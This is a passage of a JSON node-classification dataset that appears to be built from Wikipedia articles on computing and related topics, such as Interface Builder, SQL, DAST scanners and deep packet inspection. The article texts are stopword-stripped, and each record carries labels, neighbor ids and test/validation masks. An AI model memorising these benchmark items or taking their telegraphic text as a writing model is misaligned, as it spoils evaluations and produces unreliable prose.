    "text": "Interface_Builder:interface builder interface builder software development application apple macos operating system part xcode formerly project builder apple developer developer toolset interface builder allows cocoa carbon developers create interfaces applications using graphical user interface resulting interface stored .nib file short next interface builder recently .xib file interface builder descended nextstep development software name version interface builder also used development openstep software similar tool called gorm exists gnustep march 27 2008 specialized iphone version interface builder allowing interface construction iphone applications released iphone sdk beta 2 interface builder intentionally developed separate application allow interaction designers design interfaces without use code-oriented ide xcode 4 apple integrated functionality directly xcode interface builder first made appearance 1986 written lisp experlisp product expertelligence invented developed jean-marie hullot using object-oriented features experlisp deeply integrated macintosh toolbox denison bollay took jean-marie hullot next later year demonstrate steve jobs jobs immediately recognized value started incorporating nextstep 1988 part nextstep 0.8 first commercial application allowed interface objects buttons menus windows placed interface using mouse one notable early use interface builder development first worldwideweb web browser tim berners-lee cern made using next workstation interface builder provides palettes collections user interface objects objective-c swift developer user interface objects contain items like text fields data tables sliders pop-up menus interface builder palettes completely extensible meaning developer develop new objects add palettes interface builder build interface developer simply drags interface objects palette onto window menu actions messages objects emit connected targets application code outlets pointers declared application code connected specific objects way initialization done runtime improving performance streamlining development process interface builder standalone application interface designers could ship nib files developers would drop projects interface builder saves application interface bundle contains interface objects relationships used application objects archived process also known serialization marshalling contexts either xml file next-style property list file .nib extension upon running application proper nib objects unarchived connected binary owning application awakened unlike almost gui designer systems generate code construct ui notable exceptions glade embarcadero technologies delphi c++builder stream ui objects similarly nibs often referred freeze dried contain archived objects ready run interface builder version 3 new file format extension .xib added functionally identical .nib except stored flat file making suitable storage revision control systems processing tools diff",
    "neighbors": [
      2819,
      9732,
      10755,
      6023,
      7307,
      1549,
      10765,
      4111,
      5784,
      6554,
      11420,
      5409,
      11430,
      4520,
      6186,
      3371,
      7983,
      8754,
      2363,
      1852,
      2365,
      2366,
      576,
      5696,
      1347,
      5194,
      7378,
      3286,
      1623,
      7640,
      6234,
      7133,
      3038,
      350,
      479,
      3681,
      6502,
      10470,
      2282,
      3691,
      3948,
      4844,
      7806,
      8303,
      8304,
      10478,
      5619,
      6264,
      7292,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 10407,
    "label": 3,
    "text": "Dup_(system_call):dup system call unix-like operating systems dup short duplicate dup2 system calls create copy given file descriptor new descriptor actually behave like copy like alias old one dup dup2 calls standardized posix specification former allocates first available descriptor like open behaves alternative way duplicate file descriptor unspecified place fcntl system call codice_1 command latter places copy newfd newfd open closed first unix shells use dup2 input/output redirection along codice_2 tool unix pipes rely following example uses codice_2 codice_4 order connect two separate processes program1 program2 using unix pipes",
    "neighbors": [
      10016,
      6498,
      4968,
      7933,
      5514,
      823,
      11442,
      8499,
      7540,
      5397,
      8438,
      5911,
      6813
    ],
    "mask": "Test"
  },
  {
    "node_id": 10408,
    "label": 1,
    "text": "Port_State_Control:port state control port state control psc inspection regime countries inspect foreign-registered ships port flag state take action ships compliance inspectors called psc officers required investigate compliance requirements international conventions solas marpol stcw mlc inspections involve checking vessel manned operated compliance applicable international law verifying competency ship master officers ship condition equipment 1978 number european countries agreed hague memorandum audit labour conditions board vessels whether accordance rules ilo amoco cadiz sank year decided also audit safety pollution practices end 1982 fourteen european countries agreed paris memorandum understanding port state control paris mou establish port state control nowadays 26 european countries canada signatories paris mou psc reaction failure flag states especially flag convenience states — delegated survey certification responsibilities classification societies modeled paris mou several regional mous signed including tokyo mou pacific ocean acuerdo latino acuerdo de viña del mar south central america caribbean mou mediterranean mou indian ocean mou abuja mou west central atlantic africa black sea mou riyadh mou persian gulf port state control psc makes inspection ships port taken port state control officer psco annual report paris mou reported total 74,713 deficiencies recorded port state control inspections 2007 deficiencies resulted 1,250 detentions year detention ship last course action psco would take upon finding deficiencies aboard vessel courses action psco may impose ship deficiencies order ascending gravity",
    "neighbors": [
      10073,
      41,
      3090,
      676
    ],
    "mask": "None"
  },
  {
    "node_id": 10409,
    "label": 0,
    "text": "Transcriber:transcriber transcriber tool transcription annotation speech signals linguistic research supports multiple hierarchical layers segmentation named entity annotation speaker lists topic lists overlapping speakers two views sound pressure waveform different resolutions may viewed simultaneously various character encodings including unicode supported annotations transcriber may exported xml oasis cover pages publishes open dtd used transcriber transcriber written tcl/tk snack audio library therefore available major platforms distributed gnu general public license transcriber superseded transcriberag",
    "neighbors": [
      6144,
      6626,
      5612,
      7983,
      4979,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 10410,
    "label": 2,
    "text": "Nokia_E52/E55:nokia e52/e55 nokia e52 nokia e55 smartphones nokia business-oriented eseries range run symbian os v9.3 s60 3rd edition fp1 e55 announced 16 february 2009 whilst e52 announced later 6 may 2009 physically functionally identical except e55 'half-qwerty keyboard whereas e52 revision traditional t9 keypad available black black aluminum metal grey aluminium white aluminium gold came 1gb microsd memory card supports microsd cards 32gb memory also 60 mb free user memory e52 successor nokia successful e51 model latest firmware version v091.004 released june 2 2012 e52 e55 9.9 mm thickness slim time feature mostly metallic bodies nokia called e55 world thinnest smartphone 0.1 mm thinner nokia e71 e55 model unique 'compact qwerty keyboard featuring two letters qwerty order single key observed 5.5 watt-hour 1500 mah 3.7 v battery easily last 27 days practical use considerably higher phones class made nokia manufacturers wifi bluetooth used built-in voip client active battery last 24 hours",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      3462,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      10270,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      8360,
      3626,
      5290,
      10410,
      9262,
      690,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      737,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      5875,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 10411,
    "label": 2,
    "text": "CNK_operating_system:cnk operating system compute node kernel cnk node level operating system ibm blue gene series supercomputers compute nodes blue gene family supercomputers run compute node kernel cnk lightweight kernel runs node supports one application running one user node maximize operating efficiency design cnk kept simple minimal implemented 5,000 lines c++ code physical memory statically mapped cnk neither needs provides scheduling context switching given point runs one application one user allowing virtual memory multi-tasking design cnk aimed devote many cycles possible application processing cnk even implement file input/output i/o compute node delegates dedicated i/o nodes i/o nodes blue gene supercomputers run different operating system i/o node kernel ink ink based modified linux kernel",
    "neighbors": [
      6179,
      1795,
      1480,
      7497,
      1933,
      7983,
      1168,
      8242,
      6675
    ],
    "mask": "None"
  },
  {
    "node_id": 10412,
    "label": 4,
    "text": "Dynamic_Application_Security_Testing:dynamic application security testing dynamic application security testing dast tool program communicates web application web front-end order identify potential security vulnerabilities web application architectural weaknesses performs black-box test unlike static application security testing tools dast tools access source code therefore detect vulnerabilities actually performing attacks dast tools allow sophisticated scans detecting vulnerabilities minimal user interactions configured host name crawling parameters authentication credentials tools attempt detect vulnerabilities query strings headers fragments verbs get/post/put dom injection customers benefit convenience applications tacitly taking risk private information stored web applications compromised hacker attacks insider leaks according privacy rights clearinghouse 18 million customer records compromised 2012 due insufficient security controls corporate data web applications dast tools facilitate automated review web application expressed purpose discovering security vulnerabilities required comply various regulatory requirements web application scanners look wide variety vulnerabilities input/output validation e.g cross-site scripting sql injection specific application problems server configuration mistakes copyrighted report published march 2012 security vendor cenzic common application vulnerabilities recently tested applications include commercial scanners category web-assessment tools need bought specific price usually quite high scanners include free features need bought full access tool power open-source scanners another class free nature best category since source code open user gets know happening unlike commercial scanners security researcher shay chen previously compiled exhaustive list commercial open-source web application security scanners list also highlights scanners performed benchmarking tests wavsep wavsep platform publicly available used evaluate various aspects web application scanners technology support performance accuracy coverage result consistency tools detect vulnerabilities finalized release candidate versions prior shipping scanners simulate malicious user attacking probing identifying results part expected result set dynamic testing tool web scanners language dependent web application scanner able scan engine-driven web applications attackers use tools tools find vulnerability attackers scanning dast tool data may overwritten malicious payloads injected subject site sites scanned production like non-production environment ensure accurate results protecting data production environment tool implementing dynamic testing method cover 100 source code application application penetration tester look coverage web application attack surface know tool configured correctly able understand web application tool implement variants attacks given vulnerability tools generally predefined list attacks generate attack payloads depending tested web application tools also quite limited understanding behavior applications dynamic content javascript flash report 2012 found top application technologies overlooked web application scanners includes json jquery rest google webtoolkit ajax applications flash remoting amf html5 well mobile apps web services using json rest xml-rpc soap technologies used web services complex workflows shopping cart xsrf/csrf tokens also listed",
    "neighbors": [
      1474,
      899,
      1251,
      5636,
      2470,
      3462,
      4198,
      2409,
      6665,
      1803,
      331,
      7526,
      5682,
      3604,
      9432,
      10492,
      8094
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10413,
    "label": 1,
    "text": "SQL:sql sql s-q-l sequel structured query language domain-specific language used programming designed managing data held relational database management system rdbms stream processing relational data stream management system rdsms particularly useful handling structured data relations different entities/variables data sql offers two main advantages older read/write apis like isam vsam first introduced concept accessing many records one single command second eliminates need specify reach record e.g without index originally based upon relational algebra tuple relational calculus sql consists many types statements may informally classed sublanguages commonly data query language dql data definition language ddl data control language dcl data manipulation language dml scope sql includes data query data manipulation insert update delete data definition schema creation modification data access control although sql often described great extent declarative language 4gl also includes procedural elements sql one first commercial languages edgar f. codd relational model model described influential 1970 paper relational model data large shared data banks despite entirely adhering relational model described codd became widely used database language sql became standard american national standards institute ansi 1986 international organization standardization iso 1987 since standard revised include larger set features despite existence standards sql code completely portable among different database systems without adjustments sql initially developed ibm donald d. chamberlin raymond f. boyce learning relational model ted codd early 1970s version initially called sequel structured english query language designed manipulate retrieve data stored ibm original quasi-relational database management system system r group ibm san jose research laboratory developed 1970s chamberlin boyce first attempt relational database language square difficult use due subscript notation moving san jose research laboratory 1973 began work sequel acronym sequel later changed sql sequel trademark uk-based hawker siddeley dynamics engineering limited company testing sql customer test sites determine usefulness practicality system ibm began developing commercial products based system r prototype including system/38 sql/ds db2 commercially available 1979 1981 1983 respectively late 1970s relational software inc. oracle corporation saw potential concepts described codd chamberlin boyce developed sql-based rdbms aspirations selling u.s. navy central intelligence agency u.s. government agencies june 1979 relational software inc. introduced first commercially available implementation sql oracle v2 version2 vax computers 1986 ansi iso standard groups officially adopted standard database language sql language definition new versions standard published 1989 1992 1996 1999 2003 2006 2008 2011 recently 2016 sql deviates several ways theoretical foundation relational model tuple calculus model table set tuples sql tables query results lists rows row may occur multiple times order rows employed queries e.g limit clause critics argue sql replaced language strictly returns original foundation example see third manifesto however known proof exists uniqueness added sql least variation sql words quite possible sql fixed least improved regard industry may switch completely different query language obtain uniqueness debate remains open /math sql language subdivided several language elements including sql designed specific purpose query data contained relational database sql set-based declarative programming language imperative programming language like c basic however extensions standard sql add procedural programming language functionality control-of-flow constructs include addition standard sql/psm extensions proprietary sql extensions procedural object-oriented programmability available many sql platforms via dbms integration languages sql standard defines sql/jrt extensions sql routines types java programming language support java code sql databases sql server 2005 uses sqlclr sql server common language runtime host managed .net assemblies database prior versions sql server restricted unmanaged extended stored procedures primarily written c. postgresql lets users write functions wide variety languages—including perl python tcl javascript pl/v8 c. sql implementations incompatible vendors necessarily completely follow standards particular date time syntax string concatenation codice_1s comparison case sensitivity vary vendor vendor particular exceptions postgresql mimer sql strive standards compliance though postgresql adhere standard folding unquoted names done folding unquoted names lower case postgresql incompatible sql standard says unquoted names folded upper case thus codice_2 equivalent codice_3 codice_4 according standard popular implementations sql commonly omit support basic features standard sql codice_5 codice_6 data types obvious examples incidentally popular commercial proprietary sql dbmss oracle whose codice_5 behaves codice_8 lacks codice_6 type ms sql server 2008 version result sql code rarely ported database systems without modifications several reasons lack portability database systems sql adopted standard american national standards institute ansi 1986 sql-86 international organization standardization iso 1987 maintained iso/iec jtc 1 information technology subcommittee sc 32 data management interchange standard commonly denoted pattern iso/iec 9075-n yyyy part n title shortcut iso/iec 9075 iso/iec 9075 complemented iso/iec 13249 sql multimedia application packages sql/mm defines sql based interfaces packages widely spread applications like video audio spatial data 1996 national institute standards technology nist data management standards program certified sql dbms compliance sql standard vendors self-certify compliance products original standard declared official pronunciation sql initialism ess cue el regardless many english-speaking database professionals including donald chamberlin use acronym-like pronunciation sequel mirroring language pre-release development name sequel sql standard gone number revisions interested parties may purchase sql standards documents iso iec ansi draft sql:2008 freely available zip archive sql standard divided ten parts iso/iec 9075 complemented iso/iec 13249 sql multimedia application packages closely related separate standard developed committee defines interfaces packages based sql aim unified access typical database applications like text pictures data mining spatial data iso/iec 9075 also accompanied series technical reports published iso/iec tr 19075 8 parts technical reports explain justification usage features sql giving examples appropriate technical reports non-normative discrepancy 9075 text 9075 holds currently available 19075 technical reports distinction made alternatives sql language alternatives relational model proposed relational alternatives sql language see navigational database nosql alternatives relational model distributed relational database architecture drda designed work group within ibm period 1988 1994 drda enables network connected relational databases cooperate fulfill sql requests interactive user program issue sql statements local rdb receive tables data status indicators reply remote rdbs sql statements also compiled stored remote rdbs packages invoked package name important efficient operation application programs issue complex high-frequency queries especially important tables accessed located remote systems messages protocols structural components drda defined distributed data management architecture chamberlin 2012 paper discusses four historical criticisms sql early specifications support major features primary keys result sets could named sub-queries defined added 1992 sql controversial null three-value logic predicates evaluated nulls return logical value unknown rather true false features outer-join depend nulls null equivalent space null represents data row another popular criticism allows duplicate rows making integration languages python whose data types might make difficult accurately represent data difficult terms parsing absence modularity avoided declaring unique constraint one fields identifies uniquely row table constraint could also become primary key table similar sense object-relational impedance mismatch mismatch declarative sql language procedural languages sql typically embedded iso/iec information technology task force publishes publicly available standards including sql technical corrigenda corrections technical reports discussion documents published sql -- part 1 framework sql/framework formal sql standards available iso ansi fee informative use opposed strict standards compliance late drafts often suffice",
    "neighbors": [
      6147,
      8201,
      6154,
      10250,
      2063,
      6161,
      10258,
      2068,
      8217,
      8225,
      4135,
      44,
      10286,
      8262,
      6219,
      83,
      10326,
      4183,
      10340,
      10342,
      8295,
      2163,
      2181,
      10374,
      2183,
      4236,
      6285,
      10389,
      151,
      2206,
      4255,
      4263,
      6311,
      2221,
      10413,
      10435,
      8393,
      210,
      10459,
      8421,
      10471,
      8426,
      6383,
      8434,
      261,
      8458,
      2320,
      10518,
      6424,
      284,
      6430,
      2344,
      6451,
      10551,
      10555,
      10560,
      2369,
      10565,
      6470,
      8524,
      10573,
      6479,
      8539,
      8554,
      2413,
      6511,
      8559,
      6521,
      4476,
      10628,
      8582,
      10632,
      4502,
      2456,
      428,
      8627,
      10684,
      2496,
      2512,
      2519,
      2520,
      479,
      6629,
      6630,
      8683,
      2544,
      8689,
      10737,
      502,
      6651,
      4604,
      10752,
      4614,
      10762,
      8717,
      4630,
      6692,
      8742,
      10791,
      8775,
      4680,
      8777,
      2641,
      8788,
      8792,
      8799,
      10849,
      8804,
      10854,
      4713,
      8810,
      2669,
      2670,
      6775,
      6780,
      2691,
      8844,
      8854,
      8860,
      6822,
      2727,
      8871,
      4777,
      10921,
      6831,
      692,
      6850,
      10950,
      8904,
      10953,
      4811,
      6860,
      2775,
      2780,
      736,
      4840,
      2810,
      2819,
      6920,
      11017,
      11024,
      8979,
      11030,
      11036,
      6943,
      11056,
      6977,
      6990,
      4944,
      6993,
      853,
      2901,
      2904,
      11098,
      7018,
      7022,
      9075,
      7031,
      888,
      899,
      2948,
      7053,
      5006,
      9112,
      2972,
      7076,
      9124,
      5030,
      7080,
      2990,
      5047,
      5051,
      3004,
      963,
      11203,
      974,
      11218,
      11219,
      9177,
      9179,
      987,
      3045,
      1010,
      7157,
      7159,
      1016,
      1034,
      1037,
      9234,
      5139,
      7191,
      1049,
      5149,
      9245,
      3126,
      1079,
      11324,
      11327,
      7233,
      9286,
      9290,
      11338,
      11339,
      5198,
      11343,
      5209,
      5210,
      9316,
      3176,
      1136,
      1146,
      5242,
      11386,
      11392,
      5249,
      9345,
      7310,
      9362,
      1178,
      3230,
      7326,
      11422,
      9386,
      9389,
      9397,
      3254,
      1215,
      1222,
      1244,
      9455,
      5364,
      7412,
      3323,
      9467,
      9471,
      5379,
      9481,
      11530,
      7446,
      5401,
      5403,
      11551,
      1314,
      5413,
      7475,
      3388,
      3400,
      5450,
      11596,
      11604,
      9557,
      3414,
      7518,
      3427,
      7523,
      1383,
      11625,
      9589,
      3447,
      3454,
      5509,
      3462,
      7576,
      9631,
      9634,
      11688,
      5546,
      5549,
      5560,
      3515,
      3541,
      1501,
      3556,
      7654,
      3562,
      5612,
      5614,
      3573,
      9729,
      5640,
      1549,
      5658,
      9762,
      5669,
      1579,
      5677,
      5678,
      7742,
      9796,
      1606,
      1610,
      7762,
      7767,
      1636,
      9828,
      7785,
      3711,
      3712,
      5779,
      9893,
      5816,
      7868,
      5827,
      5830,
      9926,
      3816,
      5866,
      3821,
      1775,
      1780,
      7930,
      7935,
      5888,
      5896,
      7946,
      1816,
      5921,
      5929,
      7983,
      3894,
      10040,
      1856,
      5953,
      10048,
      8006,
      10058,
      3921,
      10069,
      1884,
      8028,
      3934,
      3951,
      5999,
      3960,
      6015,
      3986,
      10137,
      10148,
      6060,
      4042,
      10193,
      2004,
      4055,
      10201,
      4057,
      4058,
      8154,
      4064,
      4065,
      4066,
      6112,
      2026,
      6124,
      8188,
      2045,
      10238
    ],
    "mask": "None"
  },
  {
    "node_id": 10414,
    "label": 2,
    "text": "Windows_Image_Acquisition:windows image acquisition windows image acquisition wia sometimes also called windows imaging architecture proprietary microsoft driver model application programming interface api microsoft windows later windows operating systems enables graphics software communicate imaging hardware scanners digital cameras digital video equipment first introduced 2000 part windows continues standard imaging device api model successive windows versions implemented on-demand service windows xp later windows operating systems wia significant superset support digital still imaging drivers provided still image architecture sti windows 98 whereas sti provided low-level interface basic transfers data device well invocation image scan process windows machine external device wia provides framework device present unique capabilities operating system applications invoke features according microsoft wia drivers made user interface ui component driver core component loaded two different process spaces ui application space driver core wia service space certain scanners support wia 2002 microsoft released windows image acquisition automation library tool provides access wia functionality programming languages scripting environments support ole automation windows xp wia runs localsystem context security ramifications running service localsystem whereby buggy driver malicious person would unrestricted access system wia service windows server 2003 windows vista operates localservice context result compatibility issues using driver designed windows xp windows xp support added automatic document feeder scanners scroll-feed scanners without preview capabilities multi-page tiff generation wia video snapshot filter driver introduced allows still frames captured video stream windows vista introduced windows image acquisition 2.0 windows vista also wia automation library built-in wia2 supports push scanning multi-image scanning push scanning allows initiating scans adjusting scanning parameters directly scanner control panel multi-image scanning allows one scan several images save directly separate files however video content support removed wia windows vista",
    "neighbors": [
      10243,
      10255,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      5225,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      2221,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      3496,
      6584,
      2493,
      7629,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10415,
    "label": 2,
    "text": "Queued_Telecommunications_Access_Method:queued telecommunications access method queued telecommunications access method qtam ibm system/360 communications access method incorporating built-in queuing qtam alternative lower level basic telecommunications access method btam access method qtam announced ibm 1965 part os/360 dos/360 aimed inquiry data collection announced also supported remote job entry rje applications called job processing dropped 1968 originally qtam supported ibm 1030 data collection system ibm 1050 data communications system ibm 1060 data communications system 83b2 selective calling stations western union plan 115a outstations teletype model 33 35 teletypewriters 1968 terminal support expanded include ibm 2260 display complex ibm 2740 communications terminal qtam devices attached system/360 multiplexor channel ibm 2701 data adapter ibm 2702 transmission control 1968 support ibm 2703 transmission control unit added qtam succeeded tcam provided roughly similar facilities supported dos qtam consists message control program mcp zero message processing programs mpp mcp handles communications terminals identifies input messages starts mpps process required similar concept much later internet service daemon inetd unix systems mcp assembled user installation set macros supplied ibm macros define lines terminals comprising system datasets required procedures used process received transmitted messages mpps incorporating logic process various messages supplied installation use standard os/360 data management macros codice_1 codice_2 codice_3 codice_4 pl/i includes codice_5 file declaration attribute allow mpps written high-level language",
    "neighbors": [
      1219,
      868,
      11131,
      7272,
      8393,
      4586,
      10508,
      10094,
      10958,
      5936,
      10040,
      3669,
      8502,
      2616,
      3323,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 10416,
    "label": 4,
    "text": "Network_Based_Application_Recognition:network based application recognition network based application recognition nbar mechanism used cisco routers switches recognize dataflow inspecting packets sent networking equipment uses nbar deep packet inspection packets dataflow determine traffic category flow belongs used conjunction features may program internal application-specific integrated circuits asics handle flow appropriately categorization may done open systems interconnection osi layer 4 info packet content signaling new applications made difficult purpose cling kind tagging nbar approach useful dealing malicious software using known ports fake priority traffic well non-standard applications using dynamic ports nbar also known osi layer 7 categorization cisco routers nbar mainly used quality service security purposes",
    "neighbors": [
      10417
    ],
    "mask": "Test"
  },
  {
    "node_id": 10417,
    "label": 4,
    "text": "Deep_packet_inspection:deep packet inspection deep packet inspection dpi type data processing inspects detail data sent computer network usually takes action blocking re-routing logging accordingly deep packet inspection often used ensure data correct format check malicious code eavesdropping internet censorship among purposes multiple headers ip packets network equipment needs use first ip header normal operation use second header tcp udp normally considered shallow packet inspection usually called stateful packet inspection despite definition multiple ways acquire packets deep packet inspection using port mirroring sometimes called span port common way well optical splitter deep packet inspection filtering enables advanced network management user service security functions well internet data mining eavesdropping internet censorship although dpi used internet management many years advocates net neutrality fear technique may used anticompetitively reduce openness internet dpi used wide range applications so-called enterprise level corporations larger institutions telecommunications service providers governments dpi combines functionality intrusion detection system ids intrusion prevention system ips traditional stateful firewall combination makes possible detect certain attacks neither ids/ips stateful firewall catch stateful firewalls able see beginning end packet flow catch events would bounds particular application idss able detect intrusions little capability blocking attack dpis used prevent attacks viruses worms wire speeds specifically dpi effective buffer overflow attacks denial-of-service attacks dos sophisticated intrusions small percentage worms fit within single packet dpi-enabled devices ability look layer 2 beyond layer 3 osi model cases dpi invoked look layer 2-7 osi model includes headers data protocol structures well payload message dpi functionality invoked device looks takes action based information beyond layer 3 osi model dpi identify classify traffic based signature database includes information extracted data part packet allowing finer control classification based header information end points utilize encryption obfuscation techniques evade dpi actions many cases classified packet may redirected marked/tagged see quality service blocked rate limited course reported reporting agent network way http errors different classifications may identified forwarded analysis many dpi devices identify packet flows rather packet-by-packet analysis allowing control actions based accumulated flow information initially security enterprise level perimeter discipline dominant philosophy keeping unauthorized users shielding authorized users outside world frequently used tool accomplishing stateful firewall permit fine-grained control access outside world pre-defined destinations internal network well permitting access back hosts request outside world made previously vulnerabilities exist network layers however visible stateful firewall also increase use laptops enterprise makes difficult prevent threats viruses worms spyware penetrating corporate network many users connect laptop less-secure networks home broadband connections wireless networks public locations firewalls also distinguish permitted forbidden uses legitimately-accessed applications dpi enables administrators security officials set policies enforce layers including application user layer help combat threats deep packet inspection able detect kinds buffer overflow attacks dpi may used enterprise data leak prevention dlp e-mail user tries send protected file user may given information get proper clearance send file addition using dpi secure internal networks internet service providers also apply public networks provided customers common uses dpi isps lawful intercept policy definition enforcement targeted advertising quality service offering tiered services copyright enforcement service providers required almost governments worldwide enable lawful intercept capabilities decades ago legacy telephone environment met creating traffic access point tap using intercepting proxy server connects government surveillance equipment acquisition component functionality may provided many ways including dpi dpi-enabled products li calea-compliant used – directed court order – access user datastream service providers obligated service-level agreement customers provide certain level service time enforce acceptable use policy may make use dpi implement certain policies cover copyright infringements illegal materials unfair use bandwidth countries isps required perform filtering depending country laws dpi allows service providers readily know packets information receiving online—from e-mail websites sharing music video software downloads policies defined allow disallow connection ip address certain protocols even heuristics identify certain application behavior isps route traffic customers able monitor web-browsing habits detailed way allowing gain information customers interests used companies specializing targeted advertising least 100,000 united states customers tracked way many 10 u.s. customers tracked way technology providers include nebuad front porch phorm u.s. isps monitoring customers include knology wide open west addition united kingdom isp british telecom admitted testing solutions phorm without customers knowledge consent dpi used net neutrality applications peer-to-peer p2p traffic present increasing problems broadband service providers typically p2p traffic used applications file sharing may kind files i.e documents music videos applications due frequently large size media files transferred p2p drives increasing traffic loads requiring additional network capacity service providers say minority users generate large quantities p2p traffic degrade performance majority broadband subscribers using applications e-mail web browsing use less bandwidth poor network performance increases customer dissatisfaction leads decline service revenues dpi allows operators oversell available bandwidth ensuring equitable bandwidth distribution users preventing network congestion additionally higher priority allocated voip video conferencing call requires low latency versus web browsing approach service providers use dynamically allocate bandwidth according traffic passing networks mobile broadband service providers use dpi means implement tiered service plans differentiate walled garden services value added all-you-can-eat one-size-fits-all data services able charge walled garden per application per service all-you-can-eat rather one-size-fits-all package operator tailor offering individual subscriber increase average revenue per user arpu policy created per user user group dpi system turn enforces policy allowing user access different services applications isps sometimes requested copyright owners required courts official policy help enforce copyrights 2006 one denmark largest isps tele2 given court injunction told must block customers accessing pirate bay launching point bittorrent instead prosecuting file sharers one time international federation phonographic industry ifpi big four record labels emi sony bmg universal music warner music begun suing isps eircom enough protecting copyrights ifpi wants isps filter traffic remove illicitly uploaded downloaded copyrighted material network despite european directive 2000/31/ec clearly stating isps may put general obligation monitor information transmit directive 2002/58/ec granting european citizens right privacy communications motion picture association america mpaa enforces movie copyrights taken position federal communications commission fcc network neutrality could hurt anti-piracy techniques deep packet inspection forms filtering dpi allows isps gather statistical information use patterns user group instance might interest whether users 2 mbit connection use network dissimilar manner users 5 mbit connection access trend data also helps network planning addition using dpi security networks governments north america europe asia use dpi various purposes surveillance censorship many programs classified fcc adopts internet calea requirements fcc pursuant mandate u.s. congress line policies countries worldwide required telecommunication providers including internet services capable supporting execution court order provide real-time communication forensics specified users 2006 fcc adopted new title 47 subpart z rules requiring internet access providers meet requirements dpi one platforms essential meeting requirement deployed purpose throughout u.s national security agency nsa cooperation inc. used deep packet inspection make internet traffic surveillance sorting forwarding intelligent dpi used find packets carrying e-mail voice internet protocol voip telephone call traffic associated ’ common backbone split two fibers dividing signal 50 percent signal strength went output fiber one output fibers diverted secure room carried communications ’ switching equipment secure room contained narus traffic analyzers logic servers narus states devices capable real-time data collection recording data consideration capture 10 gigabits per second certain traffic selected sent dedicated line central location analysis according affidavit expert witness j. scott marcus former senior advisor internet technology us federal communications commission diverted traffic represented substantially ’ peering traffic san francisco bay area thus designers ... configuration made attempt terms location position fiber split exclude data sources primarily domestic data narus semantic traffic analyzer software runs ibm dell linux servers using dpi sorts ip traffic 10gbit/s pick specific messages based targeted e-mail address ip address case voip telephone number president george w. bush attorney general alberto r. gonzales asserted believe president authority order secret intercepts telephone e-mail exchanges people inside united states contacts abroad without obtaining fisa warrant defense information systems agency developed sensor platform uses deep packet inspection chinese government uses deep packet inspection monitor censor network traffic content claims harmful chinese citizens state interests material includes pornography information religion political dissent chinese network isps use dpi see sensitive keyword going network connection cut people within china often find blocked accessing web sites containing content related taiwanese tibetan independence falun gong dalai lama tiananmen square protests massacre 1989 political parties oppose ruling communist party variety anti-communist movements materials signed dpi sensitive keywords already china previously blocked voip traffic country many available voip applications function china voice traffic skype unaffected although text messages subject dpi messages containing sensitive material curse-words simply delivered notification provided either participant conversation china also blocks visual media sites youtube.com various photography blogging sites iranian government purchased system reportedly deep packet inspection 2008 nokia siemens networks nsn joint venture siemens ag german conglomerate nokia corp. finnish cell telephone company nsn nokia solutions networks according report wall street journal june 2009 quoting nsn spokesperson ben roome according unnamed experts cited article system enables authorities block communication monitor gather information individuals well alter disinformation purposes system purchased telecommunication infrastructure co. part iranian government telecom monopoly according journal nsn provided equipment iran last year internationally recognized concept 'lawful intercept said mr. roome relates intercepting data purposes combating terrorism child pornography drug trafficking criminal activities carried online capability telecom companies said ... monitoring center nokia siemens networks sold iran described company brochure allowing 'the monitoring interception types voice data communication networks joint venture exited business included monitoring equipment called 'intelligence solution end march selling perusa partners fund 1 lp munich-based investment firm mr. roome said said company determined longer part core business nsn system followed purchases iran secure computing corp. earlier decade questions raised reporting reliability journal report david isenberg independent washington d.c.-based analyst cato institute adjunct scholar specifically saying mr. roome denying quotes attributed isenberg also similar complaints one journal reporters earlier story nsn issued following denial nsn provided deep packet inspection web censorship internet filtering capability iran concurrent article new york times said nsn sale covered spate news reports april 2009 including washington times reviewed censorship internet media country mention dpi according walid al-saqaf developer internet censorship circumventor alkasir iran using deep packet inspection february 2012 bringing internet speeds entire country near standstill briefly eliminated access tools tor alkasir dpi yet mandated russia federal law №139 enforces blocking websites russian internet blacklist using ip filtering force isps analyzing data part packets yet isps still use different dpi solutions implement blacklisting 2019 governmental agency roskomnadzor planning nationwide rollout dpi pilot project one country regions estimated cost 20 billion roubles us 300m human rights activists consider deep packet inspection contrary article 23 constitution russian federation though legal process prove refute never taken place city state reportedly employs deep packet inspection internet traffic state reportedly employs deep packet inspection internet traffic analyze block unallowed transit incumbent malaysian government headed barisan nasional said using dpi political opponent run-up 13th general elections held 5 may 2013 purpose dpi instance block and/or hinder access selected websites e.g facebook accounts blogs news portals since 2015 egypt reportedly started join list constantly denied egyptian national telecom regulatory authority ntra officials however came news country decided block encrypted messaging app signal announced application developer april 2017 voip applications including facetime facebook messenger viber whatsapp calls skype blocked country people organizations concerned privacy network neutrality find inspection content layers internet protocol offensive saying example 'net built open access non-discrimination packets critics network neutrality rules meanwhile call solution search problem say net neutrality rules would reduce incentives upgrade networks launch next-generation network services deep packet inspection considered many undermine infrastructure internet increased use https privacy tunneling using vpns effectiveness dpi coming question response many 